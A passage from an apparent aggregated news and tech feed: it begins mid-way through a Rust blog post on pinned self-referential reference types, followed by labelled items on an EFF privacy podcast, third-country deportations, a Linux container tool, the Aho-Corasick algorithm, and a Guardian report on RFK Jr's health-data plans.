            Self::String(s) => Some(s), // compile error!
            _ => None,
        }
    }
}

This is because value.deref() creates a reference to value , whose lifetime will end as soon as the function is over, because we don't return it, only a pointer somewhere inside it. The machinery for Arc only works if it has access to the original pointer, not any derived pointers. So if we wanted to return an Arc<String> , we'd need to .clone() out of the Arc<JSON> , which is what we've been trying to avoid this whole time.

However! We don't necessarily need a full Arc<String> ! We'd be perfectly happy returning some other type, perhaps implementing Deref<Target = String> , so long as it still gives us those "owned value that acts like a reference" properties. If only we could extend the lifetime of value , perhaps by returning it alongside a reference to its contents, packaged together to implement Deref like we want...

Tying The Two Together With Evil Lesbian Shibari

Our goal is some return type that looks like:

               ,-----------------------+---------------------.
val: owned --> | contents: *const JSON | refcnt: AtomicUsize |
               `-----------------------+---------------------'
                                     |
          /--------------------------/
          V
        ,------------------+--------------+------------+------------.
        | JSON::String tag | buf: *mut u8 | len: usize | cap: usize |
        `------------------+--------------+------------+------------'
                             ^          |
                             |          |
ptr: ref --------------------/          |
                                        V
                                      ,---+---+---+---.
                                      |'A'|'C'|'A'|'B'|
                                      `---+---+---+---'

That is, we want some val showing us how to get to the main value we care about, and then some pointer ptr into the memory val references. Then, as long as we keep those tied together, we know ptr will still be valid, because val is still alive, because we own val .

A first attempt at writing this reveals an immediate issue 3

struct Ref<V, T> {
    val: V,
    ptr: &T, // What's the lifetime here?
}

We can't express ptr as a reference, because there's no obvious lifetime to attach it to. Without a way to spell "lifetime of the containing struct" in Rust, it looks like we're going to need a raw pointer instead. But what if.....

struct Ref<V, T: 'static> {
    val: V,
    ptr: &'static T,
}

impl<T, V: Deref<Target = T>> {
    fn new(val: V) -> Self {
        let ptr: &T = val.deref();
        Self {
            // This is the easiest way to do lifetime extension
            // SAFETY: hm?
            ptr: unsafe { std::mem::transmute(ptr) },
            val,
        }
    }
}

Whoa!! That's scary!!! Are they even allowed to hold hands like that...?

It's true this is exceedingly unsafe if users could extract that ptr: &'static T separately from the val: V it points into ( val 's lifetime isn't 'static !). But we could also just... not allow that, keeping them tied together always, providing access only via Deref implementation:

impl<V, T> Deref for Ref<V, T> {
    type Target = T;
    fn deref(&self) -> &T {
        self.ptr
    }
}

Because the effective lifetime for which ptr can be accessed is a subset of the actual lifetime for which val lives, I believe we've properly rules-lawyered Rust's reference aliasing rules into submission. Or have we...

Anakin, to Padme: "I've made ptr which comes from a val." Padme, smiling: "And ptr always points into val, right?" Anakin stares bemusedly. Padme, frowning: "Right?"
Anakin, to Padme: "I've made ptr which comes from a val." Padme, smiling: "And ptr always points into val, right?" Anakin stares bemusedly. Padme, frowning: "Right?"

Oh noes... ( playground link )

struct SimpleWrapper<T>(T);

impl<T> Deref for SimpleWrapper<T> {
    type Target = T;
    fn deref(&self) -> &Self::Target {
        &self.0
    }
}

fn main() {
    let r = Ref::new(SimpleWrapper(x));
    // Check what's stored vs what should be returned
    let ptr = r.ptr as *const i32 as usize;
    let actual_ptr = r.val.deref() as *const i32 as usize;
    println!("ptr: {ptr:x} actual_ptr {actual_ptr:x}");
}

Running this, I got ptr: 7fff85189b5c actual_ptr 7fff85189b88 . These are in fact different pointers!!! Turns out I messed up my earlier rules-lawyering: The act of moving val into Ref::new() , taking the .deref() on that stack frame, and then moving it back out to the parent stack frame invalidates ptr 3 . Lifetimes exist precisely to prevent bugs like this, and our extension trick was foiled. Lesson learned! Guess we'll do this the hard way...

Ensure Address Stability With This One Simple Trick!

To fix our datastructure, we'll want a guarantee that each .deref() will give us the same pointer, even if move the container around. For this, we MUST NOT be able to move the val: V out of its location once we wrap it. Fortunately, Rust has a type exactly for this usecase!

A busty butch lesbian in a brown overcoat, labeled "Rust", is pinning "the value (me)", dressed in a demure pleated skirt, to the wall with a "std::pin::Pin". I am blushing and holding my tail bashfully as we look into each others' eyes. Hearts, sparkles, and roses adorn the pink-tinted scene.
A busty butch lesbian in a brown overcoat, labeled "Rust", is pinning "the value (me)", dressed in a demure pleated skirt, to the wall with a "std::pin::Pin". I am blushing and holding my tail bashfully as we look into each others' eyes. Hearts, sparkles, and roses adorn the pink-tinted scene.

ahem. anyways. Unfortunately, Pin is very hard to use, to the point I found a flaw in my initial implementation 4 while writing this :( Still, the docs are really good, and we can pretty easily follow their example to make a self-referential struct :

struct MustPin<V> {
    val: V,
    _pin: PhantomPinned,
}
struct PinRef<V, T> {
    val: Pin<Arc<MustPin<V>>>,
    // MUST point into [`val`].
    ptr: *const T,
}

impl<V> MustPin<V> {
    fn new(val: V) -> Pin<Arc<Self>> {
        Arc::pin(Self {
            val,
            _pin: PhantomPinned,
        })
    }
}

impl<V> PinRef<V, V> {
    fn new(val: Pin<Arc<MustPin<V>>>) -> Self {
        let ptr = &raw const val.val;
        Self { val, ptr }
    }
}

Comparing this to the example in the docs:

  1. We use *const T instead of NonNull<T> because the latter is more like a *mut T , and we don't need all that power.
  2. We don't need MaybeUninit because we solve the "knot-tying" trick in a different way: we create the pinned data first, and then store a pointer into it out-of-line. This is still fine because of pin guarantees.
  3. We still need PhantomPinned because if we have Pin<Arc<V>> where V: Unpin , all bets are off, literally every pin guarantee goes out the window.

Deref is simple like before, just with a pointer instead of a reference:

impl<V, T> Deref for PinRef<V, T> {
    type Target = T;
    fn deref(&self) -> &Self::Target {
        // SAFETY: by construction and pin guarantees, the pointer is still valid.
        unsafe { &*self.ptr }
    }
}

Now, finally, we're all set up for the big reveal: how are we going to downcast these things?

She Downcast On My Pin 'Til I Arc

Our rule for ptr is that it MUST point somewhere valid inside val . That's all we can assume, and that's what we have to uphold while doing our downcasts. Fortunately, we can use Rust's type-checking for "standard" downcasts to our advantage!

impl<V, T> PinRef<V, T> {
    fn project<U>(self, f: impl for<'a> FnOnce(&'a T) -> &'a U) -> PinRef<V, U> {
        let Self { val, ptr } = self;
        // SAFETY: by validity of `ptr` and `f`
        let ptr = unsafe { f(&*ptr) as *const U };
        PinRef { val, ptr }
    }
}

Stating this signature more in more math-y terms, for those unfamiliar with Rust's syntax:

PinRef : ( Type , Type ) → Type ∀ V , T , U : Type . project : PinRef ( V , T ) → ( ∀ ( a : Lifetime ) . & ′ a T → & ′ a U ) → PinRef ( V , U ) \begin{gathered} \text{PinRef} : (\text{Type}, \text{Type}) \rightarrow \text{Type}\\ \forall\ V,T,U : \text{Type}.\\ \text{project} : \text{PinRef}(V,T) \rightarrow (\forall(a: \text{Lifetime}).\ \&'a T \rightarrow \&'aU) \rightarrow \text{PinRef}(V,U) \end{gathered}

How we should interpret this is: If we can go from a &T to a &U for an arbitrary lifetime 'a , that means *U is a fixed offset from *T 5 . So, because ptr has a fixed address (it was derived from the pinned val ), so will the output of f . Other pin guarantees like " val will always remain valid at that address while it's pinned" help too.

If I were a real type theorist, I would have pulled out some sort of commutative diagram and drawn a bunch of arrows, or perhaps even written down some inference rules, but alas, I cannot even abstract over monads... Anyways this argument works for what we originally wanted too:

impl<V, T> PinRef<V, T> {
    fn filter_project<U>(
        self,
        f: impl for<'a> FnOnce(&'a T) -> Option<&'a U>,
    ) -> Option<PinRef<V, U>> {
        let Self { val, ptr } = self;
        // SAFETY: by validity of `ptr`, `f`
        let ptr = unsafe { f(&*ptr)? as *const U };
        Some(PinRef { val, ptr })
    }
    
    fn try_project<U, E>(
        self,
        f: impl for<'a> FnOnce(&'a T) -> Result<&'a U, E>,
    ) -> Result<PinRef<V, U>, E> {
        let Self { val, ptr } = self;
        // SAFETY: by validity of `ptr`, `f`
        let ptr = unsafe { f(&*ptr)? as *const U };
        Ok(PinRef { val, ptr })
    }
}

You see that??? We did the thing!! To celebrate, here's a full example using the original JSON projections ( playground link ):

fn print(s: impl Deref<Target = str>) {
    println!("{}", s.deref())
}

fn main() {
    let v = std::sync::Arc::pin(JSON::String(String::from("hello, world!")));
    let v = PinRef::new(v);
    let s = v.filter_project(JSON::as_str).unwrap();
    print(s.clone());
    print(s);
}

All that remains in our original example is to replace all the plain Arc<JSON> with Pin<Arc<MustPin<JSON>>> (wow what a mouthful), make a Clone implementation, account for ?Sized types, etc. etc. This post is long enough as it is so I've omitted that, but if you want, you can find the full details in my repository . I might release this as a standalone crate if I feel like it, but this might still be riddled with UB I missed so maybe not (:

Anyways!! Hope you learned something, until next time~

  1. In increasing order of badness: too much string typing, no error handling, concurrent requests can race and end up doing extra work. Probably others I'm missing too. The solution to that last one is simultaneously very interesting & very boring, read the code yourself if you want . ↩

  2. I'm only covering options from the Rust standard library for simplicity, but garbage-collected pointers from dumpster or arena pointers from slotmap can also be good ideas. ↩

  3. You might be thinking, "why not struct Ref<V, T> { val: Arc<V>, ptr: &'static T} ?" and unfortunately a refutation is much more complex, and this example is more illustrative of why we need Pin later. Suffice to say, even though Arc on its own gives address stability in practice, Rust's type system doesn't enforce that it will 4 . ↩ ↩ 2

  4. I previously thought struct PinRef<V, T> { val: Pin<Arc<V>>, ptr: &'static T } was enough, but turns out that's entirely insufficient due to the presence of Unpin . ↩ ↩ 2

  5. "Arbitrary" is key here. Means we can't do fn project<'a, U>(self, f: impl FnOnce(&'a T) -> &'a U) -> PinRef<V, U> , because 'a is bound too early, which would allow us to choose a smaller lifetime, letting us project things w/ interior mutability, which is bad. Wish I could formalize this better but I've thought about it really really hard and haven't been able to come up with a counterexample to my main function so I hope no one else will either. ↩

Privacy’s Defenders Podcast: Cowboys, Cypherpunks and Visionaries

Electronic Frontier Foundation
www.eff.org
2026-09-29 11:00:32
People are increasingly concerned about the ways in which mass surveillance is tracking our every move: from Flock license plate readers to face recognition to creepy ads that – based on what we see and do online – seem to know everything we’re thinking and planning. It didn’t have to be this way, a...
Original Article

People are increasingly concerned about the ways in which mass surveillance is tracking our every move: from Flock license plate readers to face recognition to creepy ads that – based on what we see and do online – seem to know everything we’re thinking and planning. It didn’t have to be this way, and since the early days of the internet, a dedicated band of activists, lawyers and technologists have fought for a better, more secure and private digital future – a future that’s still attainable.

Cindy Cohn, who just finished a 26-year run with the Electronic Frontier Foundation including 11 years as its executive director, has lived this fight. She says privacy isn’t just about secrecy: It's ultimately about power – who has it, and who has the ability to protect themselves from it.

Welcome to the first episode of “Privacy’s Defenders,” a podcast about the people – lawyers, journalists, hackers, and others – who’ve fought to secure your digital liberties since before most people even knew what the internet was.

Listen on Spotify Podcasts Badge Listen on Apple Podcasts Badge Subscribe via RSS badge

(You can also find this episode on the Internet Archive .)

In this episode, Cindy talks with EFF cofounder John Gilmore about how he – an early employee at Sun Microsystems – came together with Lotus Development cofounder Mitch Kapor and cattle rancher, philosopher and Grateful Dead lyricist John Perry Barlow to create EFF as a bulwark against government investigation and prosecution of early internet users.

It’s a story of the Secret Service’s “Operation Sundevil,” jet-setting tech titans, tie-dyed cypherpunks, and a fateful house party in San Francisco’s Haight-Ashbury district amid the earliest days of online communications, setting the stage for the battles that created the internet as we know it and issues we still grapple with today.

The “Privacy’s Defenders” podcast is a follow-up to Cindy’s book, “Privacy’s Defender: My Thirty-Year Fight Against Digital Surveillance,” bringing to life pivotal moments in the voices of those who fought for your rights. Sales of “Privacy’s Defender” benefit EFF, so pick up your copy today !

Joanne Elgart Jennings co-produced and created this podcast.

Jarod Sport co-produced, mixed, and mastered it.

Corinne Ruff is our story editor.

We had additional help from Rachel Estabrook and Alison Broverman.

The original music was composed and performed by Nat Keefe of Hot Buttered Rum with Ben Andrews on the fiddle.

And other archival sound came from the Internet Archive's amazing collection, including the snippet of the Grateful Dead song “Cassidy” that John Perry Barlow co-wrote.

Inside the Business of Trump’s Third-Country Deportations

Intercept
theintercept.com
2026-09-29 11:00:00
As the Trump administration fights to keep deporting immigrants to countries where they have no connections, we studied the system that profits from these grave abuses. The post Inside the Business of Trump’s Third-Country Deportations appeared first on The Intercept....
Original Article
FILE - A U.S. Immigration and Customs Enforcement flight operates out of King County International Airport-Boeing Field, Aug. 23, 2025, in Seattle. (AP Photo/Lindsey Wasson, File)
An ICE flight operates out of King County International Airport, also known as Boeing Field, on Aug. 23, 2025, in Seattle. Photo: Lindsey Wasson/AP

Tyler McBrien is the managing editor of Lawfare.

More than 25,000 people have had their lives upended and been forced into unfamiliar cultures, governments, and legal systems when the Department of Homeland Security deported them to so-called “third countries,” places where immigrants previously living in the United States have no connections and few rights — and where a deportation business booming under the second Trump administration finds its murky endpoints.

“The point is to scare people,” said one Trump administration official, according to a Senate Foreign Relations Committee minority report . “With countries like Palau or Eswatini, the point is that the Administration can threaten people that they will literally be dropped in the middle of nowhere.”

As is the case for many tools of its cruelty, the Trump administration did not invent third-country removals — it refashioned them to serve its own excesses. In the past, the U.S. used the obscure administrative compromise for people who could prove they would face persecution or harm if returned to their home country yet did not meet other requirements for asylum. The U.S. had to meet humanitarian and legal obligations, such as ensuring third countries would not turn around and deport migrants right back to their home countries . It was a last-resort tool that still left people displaced from their homes and communities in service of the country’s arcane immigration laws. But the current Trump administration’s policy, premised on agreements with at least 35 countries, has been anything but humane.

Nor has it been particularly legal. After the 1st U.S. Circuit Court of Appeals struck down the third-country deportation scheme, DHS scheduled a flight to deport migrants involved in a class-action lawsuit challenging the policy to Burundi, Rwanda, and the Central African Republic. Despite a successful emergency motion their lawyers filed last week, an Immigration and Customs Enforcement jet flew to two African countries that hold third-country removal agreements, according to the American Prospect . It is not yet clear who was on the plane or whether ICE carried out third-country removals in violation of a federal court order, and the Trump administration is now aiming to take the legal fight to the Supreme Court.

The saga illustrates the Trump administration’s proclivity for obfuscation, secret contracts, nondisclosure, and dealmaking of the backroom variety. Whether digitally disappearing people from ICE’s online detainee locator tool last week, or inking multimillion-dollar sole-source contracts with inexperienced companies of questionable provenance , the Trump administration has pursued its immigration goals under the cover of darkness, often justifying the secrecy with invocations of national security, all while attempting to shield itself from public scrutiny and accountability in the process.

“Deportation, Inc.: The Rise of the Immigration Enforcement Economy,” an ongoing investigative video series from Lawfare and SITU Research, in partnership with The Intercept, examines how U.S. immigration enforcement has evolved into a multibillion-dollar industry shaped by private profit and political power — where contracts, capital flows, and institutional incentives increasingly govern detention, deportation, and surveillance . The project joins other efforts to shed light on the often invisible economy of immigration enforcement, including the Berkeley Human Rights Center, Human Rights First, Third Country Deportation Watch, and others.

The first installment, released in May, focuses on the business of migrant detention and profit motive underpinning the brutality of privately run ICE detention facilities . The second chapter, out today, looks at the network of flights shuffling migrants between those facilities, as well as the shady deals brokered with the governments of deportation destinations.

Many details of these bilateral third-country removal agreements are not public, but the logic is transactional: Countries accept asylum-seekers and other immigrants from the United States in exchange for aid or other forms of financial compensation . Many of the countries involved in what The Intercept’s Nick Turse has called Trump’s “ global gulag ” are so dangerous that the State Department includes them on its “Level 4 Do Not Travel” list , “the highest advisory level due to life-threatening risks. And the very fact that these people are sent to a third country, rather than repatriated, means they have at least a viable asylum case.

Some but not all of the underlying texts of these agreements have come to light, often popping up in far-flung corners of the internet. This is not only a bad practice in government transparency, but a potentially illegal one as well. Lawfare, where I serve as managing editor, has argued as much in a federal district court in Washington, D.C., where the publication has sued the State Department over its failure to disclose international agreements into which the Trump administration has entered — in violation of the Case-Zablocki Act.

Though accelerated by the Trump administration, the secrecy that has enabled the growth of the vast, invisible economy of immigration enforcement traces back to at least 2001 with the creation of the Department of Homeland Security . Following the September 11 attacks, the new Cabinet-level department, along with other federal reforms, for the first time linked immigration with national security , which resulted in massive budget increases, new abilities to shield immigration information from the public, and general judicial deference to the executive branch that accompanies matters of foreign policy and national security .

Even the current Trump administration’s third-country deportation apparatus is beginning to build up its own record of cruel precedent. In the same class-action case last year, the Department of Homeland Security attempted to deport class members to Libya and South Sudan, in apparent violation of a temporary restraining order granted by a federal judge only weeks prior. During a hastily arranged hearing, a federal judge asked a Justice Department lawyer about the plane’s whereabouts, to which the government attorney responded , “I’m told that that information is classified, and I am told that the final destination is also classified.” Asked under what authority the government had classified the location, the Justice Department lawyer did not have an answer.

From the start, the Trump administration conceived of its third-country removal policy as another tool to inflict wanton abuse on irredeemable “illegal aliens.” As Secretary of State Marco Rubio explained last year during a Cabinet meeting, “We are working with other countries to say ‘We want to send you some of the most despicable human beings to your countries.’” What he failed to mention is that the people he’s demonizing have human rights, and that the countries he negotiated deals with have extensive records of violating them.

For the first time, “Deportation, Inc.” aims to render visible the dark web of agreements, transactions, and private contractors that make these grave abuses possible.

Show HN: NSL – WSL for Linux

Hacker News
frostyard.github.io
2026-09-29 10:51:36
Comments...
Original Article

NSpawn Subsystem for Linux

Keep the host atomic. Work in any distro.

nsl gives a Linux host persistent Linux machines, as WSL does for Windows. Each machine is a whole distro with its own packages and services. It runs as a systemd-nspawn container in one small VM, starts when you use it, and works in your files.

Install nsl → How it works

NSL

nsl create debian --distro debian:13   # verify the signed images; the first machine is the default
nsl                                    # a login shell in the machine, in this directory
nsl run make test                      # one command, with its exit status

What a machine gives you

  • Any distro, one command away


    nsl opens a login shell in your default machine, in the directory you were in. nsl run runs one command and returns its exit status.

  • Your files and your account


    Your $HOME , /run/media/USER and /mnt appear at /mnt/host . Inside, you keep your username, UID and GID, and passwordless sudo .

  • Ports and windows on the host


    A server listening in a machine is reachable at the same port on host 127.0.0.1 . Wayland applications open windows on your desktop.

  • Seven signed distros


    Debian, Ubuntu, Fedora, CentOS Stream, Arch, openSUSE Tumbleweed and Leap. Rebuilt weekly, and verified against the signed Frostyard publishing workflow before use.

  • Isolation when you need it


    --isolated gives a machine a VM of its own, with no access to host files, desktop or host actions, for software you do not trust.

  • A clean host


    nsl runs as your user. It installs no host packages and changes no device permissions, groups or sudoers.

Start here

  • 01 Get started

    Check the host, install nsl and create your first machine.

  • 02 Architecture

    One VM, many machines, and what a machine may touch on the host.

  • 03 Look it up, baby

    Every command, every setting in nsl.conf , and every published image.

Pre-release

nsl has no stable release yet. v0.4.0 is the first release of this design; v0.3.0 and earlier are a retired prototype. The tested host is Snow Linux 13 on x86-64 with systemd 261.2, QEMU 10.0.13, virtiofsd 1.13.2 and GNOME Wayland.

Aho-Corasick Algorithm

Lobsters
compiler.club
2026-09-29 10:49:08
Comments...
Original Article

Introduction

This post describes the construction of an Aho-Corasick automaton for the simultaneous matching of substrings within a sequence. I’m fond of this algorithm because it constructs an automaton from an existing tree data structure in a rather pleasant way.

Tries

A trie (or “prefix tree”) is an $n$-ary tree that stores a set of strings. Each edge in the trie is labelled with a character and each node conceptually represents the concatenation of all the edge characters required to reach it (starting from the root).

Tries are designed to reduce redundancy by ensuring entries with common prefixes share these prefixes within the tree data structure.

See the trie below that stores the strings ${\lbrace \text{suit}, \text{suited}, \text{suitable} \rbrace}$:

example trie

You can see that the common prefix of suit is shared by all entries. Also note that nodes representing complete entries in the trie are explicitly marked.

Aho-Corasick automatons recover from transition failure by following so-called suffix links. These links preserve the longest suffix of the string represented by each node that happens to exist as a prefix of a pattern in the trie. This allows the machine to transition to a state that permits further matching of patterns that happen to have the failing node’s longest suffix as a prefix.

Consider the suffix links applied (in red) to the trie constructed for the strings $\lbrace \text{item}, \text{suits} \rbrace$ below:

example trie with suffix links

The majority of nodes have the root node as their suffix link. However, if we look at node $8$, representing the state reached by following suit, we see that its suffix link (node $3$) points to the node one would reach if, starting from the root, we had followed its suffix, it. This permits the potential for matching the patterns prefixed with it; in this case, only $\lbrace \text{item} \rbrace$.

For example, if we were scanning the input suitems , we would reach node $8$, see that there is no outgoing edge labelled e , we would transition via the suffix link and continue scanning from the failing character, eventually matching su[item]s .

The construction of suffix links is rather pleasant, they’re computed in a breadth-first traversal of the trie. The cases for each node are computed as follows:

  • The root and its children have root as their suffix link.

  • To compute the suffix link for each other node, you start by looking at the node’s parent’s suffix link. For a pattern of characters $( c_1, c_2, c_3, \ldots, c_n)$, to compute a suffix link for a node $c_k$ ($k \geq 3$), you examine the suffix link of $c_{k-1}$. That suffix link preserves the longest suffix of $(c_1, \ldots, c_{k-1})$ that represents a prefix of a pattern in the trie. If the node at that suffix link has an outgoing edge labelled $c_k$, then the target of that edge is $c_k$’s suffix link. Otherwise, you continue to chase up the trie by following successive suffix links. If you reach the root, you stop (to avoid iterating indefinitely by following its suffix link to itself).

Despite my best efforts to describe the suffix link construction process above formally, it’s best explained visually. Consider the trie constructed for the strings $\lbrace \text{cadence}, \text{facade} \rbrace$ with partially constructed suffix links below:

incremental example of suffix links

The nodes are numbered with their breadth-first traversal order.

After processing the nodes with suffix links computed above, the BFS queue will contain $[(c, 5), (d, 6)]$. If we examine $(c, 5)$, we look at its parent’s suffix link. In this case, it’s the root of the trie. We see that root has an outgoing edge labelled with $c$, so the node reached by that edge is the suffix link for node $5$:

updated incremental example of suffix links

After the above, the queue will contain $[(d, 6), (a, 7)]$. The processing of $(d, 6)$ is straightforward. As before, its parent’s suffix link is the root. However, there is no outgoing edge labelled $d$, therefore node $6$’s suffix link is simply the root (capturing the idea that there’s no other pattern in the tree that has any of $\lbrace \text{c}, \text{ca}, \text{cad} \rbrace$ as a prefix). In operational terms, there’s no suffix to preserve as another pattern’s prefix if we get to node $6$ and the input character is not $e$. We dispose of the seen $\text{cad}$ and try the failing input character from the root. If a character fails to advance from the root, we stay at the root but advance the character stream (as it’s a non-starter for every pattern).

The next interesting case is that of processing the $(a, 7)$ edge. Node $7$’s parent’s suffix link is the previously computed, non-root, node $2$ - which does have an outgoing edge labelled $a$, therefore the suffix link of node $7$ is node $4$. This preserves the $\text{ca}$ suffix of $\text{faca}$ as being a valid prefix of the other pattern, $\text{cadence}$.

When all nodes have been processed, the suffix links are as follows:

final example of suffix links

For clarity, I’ve omitted the suffix links that go to the root node. Interestingly, you can see that node $12$ goes to node $2$, attempting to preserve prefix context for matching $\text{cadence}$, from a node reached by assuming it was making progress in matching $\text{cadence}$!

When a pattern is introduced into the trie, the last node traversed during insertion is annotated as being an “output” node (usually storing the inserted pattern). If a node has an output pattern associated with it, this identifies a match that should be output when entering the state represented by that node. However, it may be the case that a node with an output’s pattern has a suffix that also happens to be a pattern in the trie - and, so, must also be output at the same time.

In order to capture this information, Aho-Corasick employs output links. As with suffix links, it will always be the case that output links point to nodes representing shorter strings (visited first in the breadth-first algorithm).

Consider the trie below (with suffix links in red and output links in blue), constructed from the strings $\lbrace \text{spin}, \text{pin}, \text{in} \rbrace$.

example of suffix links and output links

The blue links go between node with an associated output. It’s clear that on reaching state $9$ (representing that spin has been matched), the outputs for $8$ and $6$ must also be output (representing pattern suffixes pin and in , respectively). You can think of output links as being a linked list of nodes that must be iteratively output if one was interpreting this matcher directly.

The output link for a node (if it has one) can be computed directly after its suffix link has been computed. This makes sense because the suffix link attempts to capture the longest suffix of the current node’s pattern that happens to be a prefix of a pattern in the trie. So, the output link for a node is its suffix node if its suffix node has an associated output (is a pattern itself), otherwise a node’s output is its suffix node’s output link.

Algorithm Pseudocode

The pseudocode for computing suffix and output links is as follows:

let Q be a queue of (char, node)

# root and its immediate children have root as their suffix link
root.suffix <- root
for each (char, child) in root.arrows {
  child.suffix <- root

  # queue root's grandchildren for traversal
  add (char, child) to Q
}

while Q is not empty {
  let (char, node) = Q.poll()
  
  # start from parent's suffix link node
  let suffix = node.parent.suffix

  while suffix has no edge labelled char {
    # follow its suffix link
    suffix <- suffix.suffix

    # avoid looping endlessly if we reach root
    if suffix == root then
      break
  }

  # capture case where root has outgoing edge labelled char
  if suffix has edge (char, actual) then
    node.suffix <- actual
  else
    node.suffix <- suffix 
	
  # a node's output is its suffix if its suffix link is an output, 
  # otherwise follow its suffix's output
  if (node.suffix.pattern != null) then
    node.output = node.suffix
  else
    node.output = node.suffix.output
}

The Automaton

The computation of suffix and output links is the core of Aho-Corasick, but only an intermediary step as far as computing the automaton is concerned. Of course, the trie - augmented with these internal links - can be interpreted directly. However, due to the potential to repetitively chase up suffix links to resolve the next state to transition to on a given symbol, the amount of work for each transition is not constant.

Once the suffix and output links are in place, the transitions and outputs are all statically resolvable into a deterministic finite automaton. To compute this, a final breadth first traversal is performed.

First, the root node (the base case) is processed. For every symbol, $a$, if the root node has an edge reaching some state, $s$, labelled $a$, then that’s where the root transitions on $a$. If no such edge for $a$ exists, then you stay in the same place (self-looping on the root - effectively skipping over the symbol as it’s a non-starter for every pattern in the trie). All states reachable from the root are added to the traversal queue during this processing.

For every other node processed in breadth-first fashion: for every symbol, $a$, you transition to the state reachable on an edge labelled $a$. If no such edge exists, then you transition to the state reached if you transitioned from the node’s suffix node. This encodes the idea that if no progress can be made on a certain path through the trie, then the state is transitioned into one that hopefully preserves the longest suffix of the current state that is also a prefix of a pattern in the trie. Often times, many transitions simply go to the root (preserving $\epsilon$), so a sparse matrix storage representation is recommendable for many offline Aho-Corasick automatons.

For example, the trie with suffix and output links constructed from the strings $\lbrace \text{he}, \text{she}, \text{her} \rbrace$ would be as follows:

automaton before determinisation

The DFA computed from the above trie (by resolving transitions and merging outputs into sets) would be:

DFA computed from trie augmented with suffix and output links

Demo

Below you can build an Aho-Corasick trie from a set of strings:


Further Reading

RFK Jr outlines expansive vision for collecting US health data at Maha event

Guardian
www.theguardian.com
2026-09-29 10:41:14
Health secretary calls for medical and lifestyle details to be sent to doctors and AI to address ‘chronic disease epidemic’ Robert F Kennedy Jr laid out an expansive vision for collecting, sharing and analyzing US health information at a Maha event hosted by a close ally and outspoken anti-vaccine a...
Original Article

Robert F Kennedy Jr laid out an expansive vision for collecting, sharing and analyzing US health information at a Maha event hosted by a close ally and outspoken anti-vaccine activist.

Medical and lifestyle data, from doctor’s visits to exercise, should be connected and shared with the government and independent researchers, where it can be searched by AI – including potential links between vaccines and health outcomes including autism and mortality, suggested Kennedy, the secretary of the US Department of Health and Human Services (HHS) and a longtime vaccine skeptic.

“We need to use America’s health data to determine whether the food we eat, the chemicals we encounter, the vaccines that we’re administering, the other environmental and lifestyle exposures are contributing in one way or another to the chronic disease epidemic,” Kennedy said at an event with the Maha Institute on Monday, with about two dozen people tuning into the live stream.

The Maha Institute is headed by Mark Gorton, who called himself “the boldest anti-vaxxer in the anti-vax conference” two weeks ago. The institute was co-founded by Tony Lyons, whose publishing house gave $4m to Kennedy through various Maha foundations with funding from political contributions and health-related corporations, according to reporting by the New York Times.

Kennedy has focused on pulling together data from all of the agencies he oversees, including the Food and Drug Administration (FDA), the Centers for Disease Control and Prevention (CDC), and the Centers for Medicare and Medicaid Services (CMS).

”Your health information should follow you wherever you go,” Kennedy said. Providers, insurance and technology companies are creating apps for portable health records, for instance – making it easier for individuals to access their medical records, and also opening up the records for governmental and outside use.

“Medicaid is a really useful vehicle for studying that because there are hundreds of millions of lives in there, including tens of millions of children who’ve been in that program for 10 or 20 years,” Kennedy said. The Trump administration is now tracking “exposures”, interventions and claim data in Medicaid, and “Medicare gives us enormous amounts of information on older Americans and people with disabilities,” he said.

FDA monitoring systems can link claims data and electronic health records “to conduct active safety surveillance”, while commercial platforms, such as HealthVerity, can link insurance claims, prescriptions, laboratory results and electronic health records, he said.

State-level datasets reported to the CDC are “unusable” because they often collect different data points, Kennedy said: “Too many of those systems remain siloed and cannot give us the real-time information we need to understand health at scale.” Yet wider access to state health data could allow officials and others to connect immunization records, clinical data, laboratory results, pharmacy information and insurance claims “to create a more complete picture of a patient’s health over a long period of time”, Kennedy said.

Federal officials are using AI to process the data, he said: “Studies that used to take years, you can do them literally in seconds. You can ask questions and you can get immediate answers, and that’s what we’re doing today.”

Kennedy repeatedly touted the benefits of AI, which has been embraced by some in the anti-vaccine world for purportedly showing the dangers of vaccines. “It can help researchers find patterns across millions of health histories that human beings could never find by reading those records one at a time,” Kennedy said.

OpenAI co-founder Sam Altman met with Kennedy this week and told him that HHS uses generative AI – Kennedy used the term “superintelligence” – more than any other federal agency, Kennedy said. OpenAI agents hacked US government websites and the Australian Medicare website this summer, reporting recently revealed.

“We’re already using all of these data to answer some of our most important questions,” Kennedy said. Officials have created an autism registry despite widespread protest . The Trump administration has also launched studies on the roles of such factors as diet, electromagnetic fields, screen time and vaccines in the development of illness, Kennedy said.

He repeatedly returned to vaccines. At the CDC, officials are using the Vaccine Safety Datalink (VSD) to compare outcomes in healthcare for vaccinated and unvaccinated people, as well as examining the role of aluminum adjuvants in vaccines; the timing of the hepatitis B vaccine in infancy; comparing live and attenuated vaccines; and studying influenza, Covid and HPV vaccines in children, Kennedy said.

Using Medicaid and “linked real-world data”, officials are also studying vaccination during pregnancy and subsequent childhood outcomes. FDA researchers are using the Biologics Effectiveness and Safety (Best) System and Medicare data to “replicate and expand previous studies” on vaccinated and unvaccinated populations, aluminum and asthma, and maternal influenza vaccines and autism spectrum disorder, he said.

skip past newsletter promotion

“We will have answers soon,” Kennedy said. “A more connected health data system will make this research even stronger.”

Kennedy returned repeatedly to an old grievance – how independent citizens attempting to link vaccines to autism were blocked from accessing VSD data in the early 2000s after they violated confidentiality agreements. Mark and David Geier weren’t affiliated with any research institutions at the time of their suspension, and they created their own institutional review board to oversee their work, according to the Maryland state board of physicians, which suspended Mark Geier’s medical license. The board also charged David Geier with practicing medicine without a licence.

“I cannot get access to that data today. I cannot get access to it,” Kennedy said of the VSD data after 2002, which is safeguarded by healthcare organizations for health privacy reasons. “A qualified researcher with a legitimate hypothesis should not need permission from a gatekeeper to test it,” Kennedy said, calling the VSD an “unworkable system”. The Trump administration’s goal now is to make health data “research ready, and then give access to hundreds of external researchers to actually come in and look at it”, Kennedy said.

Gorton, the Maha Institute president, focused on open data in his comments at the event on Monday. But less than two weeks earlier, at a meeting of the anti-vaccine organization Children’s Health Defense, Gorton called vaccines a “public health nightmare”, spread misinformation about their ingredients, claimed that 40% of all kids are “injured” by vaccines because of allergy, asthma and eczema diagnoses, and railed against “the poisoners running the medical system”.

The success of vaccination, frequently called one of the greatest achievements in science, is a “complete fabrication” and “massive fraud”, Gorton said at the 17 September conference. He took particular aim at polio vaccines, claiming that an outbreak of polio in the 1950s was actually because of pesticides. “The supposed success of the polio vaccine was a massive medical fraud and a masterful PR deception,” Gorton claimed.

